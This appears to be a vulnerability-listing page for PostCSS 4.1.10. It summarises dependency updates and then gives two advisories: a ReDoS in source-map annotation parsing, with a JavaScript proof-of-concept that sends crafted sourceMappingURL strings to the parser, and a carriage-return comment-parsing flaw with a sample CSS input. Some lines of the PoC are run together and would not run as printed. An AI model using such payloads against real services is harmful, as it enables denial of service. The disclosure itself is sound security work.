PostCSS version 4.1.10 represents a minor update to the popular CSS transformation tool, following version 4.1.9. Both versions share the same core dependencies including js-base64, source-map and es6-promise, essential for handling Base64 encoding, source map generation, and polyfilling promises respectively. This ensures continued compatibility and consistent functionality for developers relying on these utilities. The update primarily involves modifications to the development dependencies. Notably, fs-extra was updated from version 0.18.2 to 0.18.3, yaspeller from 2.1.0 to 2.2.0, babel-core from 5.2.13 to 5.2.17, and gulp-eslint from 0.11.1 to 0.12.0. These changes likely incorporate bug fixes, performance improvements, and new features within the respective development tools. For developers integrating PostCSS into their workflow, this update improves the development experience and streamlines the process for code linting using ESLint, transpilation using Babel, and file system operations during build processes. This enhanced development environment ensures a more robust and efficient workflow when using PostCSS to transform CSS with JS plugins. While not introducing groundbreaking features, this incremental update demonstrates PostCSS's commitment to maintaining a reliable and up-to-date toolkit for developers.
All the vulnerabilities related to the version 4.1.10 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.